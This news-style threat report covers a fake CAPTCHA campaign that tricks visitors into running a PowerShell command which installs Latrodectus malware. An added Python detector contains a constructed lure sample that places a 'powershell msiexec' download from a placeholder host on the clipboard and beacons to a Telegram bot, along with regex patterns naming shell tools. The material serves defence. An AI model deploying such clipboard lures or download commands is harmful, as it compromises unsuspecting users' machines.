What CAPTCHA Hides: New Attack Turns Verification Tool into Spy Instrument

New deception mechanism is already active on hundreds of sites.

The Lunar Spider group, also known as Gold Swath and Elara, has activated a new malicious campaign that uses a fake CAPTCHA verification interface to infect devices. The primary method of initial access was the compromise of vulnerable websites in Europe through misconfigured CORS (Cross-Origin Resource Sharing) policy. The attackers inject a JavaScript code called iFrameOverload into the compromised resources, which overlays a fake CAPTCHA page called TeleCaptcha on top of the site's content and begins tracking user activity.
The pseudo-interface doesn't just mimic the verification process; it forces the victim to copy a generated command to the clipboard. This string includes a PowerShell command to download an MSI file, which contains an Intel executable and a malicious Latrodectus DLL. Upon execution, the EXE file registers itself for autorun via the Windows Registry Run key, and upon the next system start, it loads the DLL using DLL search order hijacking. The DLL itself is signed, but its certificate was subsequently revoked.
The Latrodectus DLL, version 2.3, establishes communication with the command-and-control (C2) server and executes various commands for information gathering. The component's configuration indicates support for RC4 encryption, numerous built-in scripts for collecting network and system data, and the ability to download additional malicious components.
Its functionality includes querying trust domains, viewing user groups, checking for the presence of antivirus software, querying the registry, and other actions typical of preparing for a follow-up attack—in particular, for ransomware distribution, an activity with which Lunar Spider, according to earlier reporting, has cooperated.
In addition to the download and installation, TeleCaptcha actively monitors the victim's clicks and sends notifications to the attackers' Telegram channel. User IDs are generated based on random combinations of adjectives and animal names and are stored in localStorage to track repeated activity. The operators show particular interest in Windows users—additional messages are sent regarding their actions, including prompts for the operator to check the malicious infrastructure's control panel.
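A defender-side heuristic for spotting a clipboard-hijacking fake CAPTCHA overlay of the kind described above in JavaScript retrieved from a site: this is an added example, not code from the original report or from TeleCaptcha itself, and the indicator set, both sample scripts and the example.invalid URL are constructed assumptions.

```python
import re

# Heuristic indicators of a clipboard-hijacking fake CAPTCHA overlay of the kind
# described above. Example code, not from the original report; the indicator
# set is an assumption based on the behaviour the article describes.
INDICATORS = {
    "clipboard_write": re.compile(r'navigator\.clipboard\.writeText|execCommand\(\s*["\']copy["\']', re.I),
    "shell_command":   re.compile(r'powershell|msiexec|mshta|cmd\.exe|rundll32', re.I),
    "captcha_lure":    re.compile(r'captcha|not a robot|verify you are human|verification step', re.I),
    "telegram_beacon": re.compile(r'api\.telegram\.org/bot', re.I),
    "localstorage_id": re.compile(r'localStorage\.(?:setItem|getItem)', re.I),
    "overlay_frame":   re.compile(r'createElement\(\s*["\']iframe["\']|position\s*[:=]\s*["\']?fixed', re.I),
}

def analyse_script(js: str) -> dict:
    """Return per-indicator hits, a hit count and a verdict for one script body."""
    hits = {name: bool(rx.search(js)) for name, rx in INDICATORS.items()}
    # Writing a shell command into the clipboard is the core of the technique;
    # the other indicators raise confidence, but a "copy link" button alone is benign.
    core = hits["clipboard_write"] and hits["shell_command"]
    score = sum(hits.values())
    verdict = "fake-captcha-lure" if core else ("suspicious" if score >= 3 else "benign")
    return {"hits": hits, "score": score, "verdict": verdict}

# Constructed samples (not the real TeleCaptcha code); example.invalid is a placeholder.
MALICIOUS_SAMPLE = r"""
var uid = localStorage.getItem("visitor") || pickName();   // adjective+animal id
localStorage.setItem("visitor", uid);
var f = document.createElement("iframe"); f.style.position = "fixed";
document.body.appendChild(f);
btn.onclick = function () {
  navigator.clipboard.writeText('powershell -c "msiexec /i https://example.invalid/update.msi"');
  fetch("https://api.telegram.org/bot<BOT_TOKEN_PLACEHOLDER>/sendMessage?text=" + uid);
  alert("Complete the verification step to continue");
};
"""
BENIGN_SAMPLE = r"""
document.getElementById("copy").onclick = function () {
  navigator.clipboard.writeText(window.location.href);   // ordinary "copy link"
  localStorage.setItem("theme", "dark");
};
"""

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        r = analyse_script(src)
        print(label, r["verdict"], [k for k, v in r["hits"].items() if v])
```

The benign "copy link" sample also uses the clipboard API and localStorage, which is why the verdict hinges on the clipboard write carrying a shell command rather than on any single indicator.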
The infrastructure used in this campaign includes domains hosted on AWS, Cloudflare, and Railnet. They are registered primarily through Asian registrars and serve different stages of the attack—from hosting the JavaScript and the fake CAPTCHA to hosting the payload and the C2 servers. Most of the websites used for the initial compromise are built on WordPress and are exposed to attack because of incorrect CORS settings.
Analysis of the discovered MSI files shows that they were built with Advanced Installer; during installation they unpack a CAB archive containing the executable and its supporting libraries. The installer runs silently, with no windows displayed, the license terms accepted automatically, and installation details written to a log. For persistence and stealth, well-known techniques are used, including autorun via the registry and DLL sideloading into a legitimate Intel executable.
This approach is a continuation of a strategy that began during the active distribution of IcedID. After the infrastructure of that malware platform was dismantled during Operation Endgame, Lunar Spider shifted to Latrodectus, maintaining the MaaS (Malware-as-a-Service) and initial access broker models. Given the rich toolkit and activity in Europe, particularly in Germany, this campaign poses a significant risk to the corporate sector, especially in the financial industry.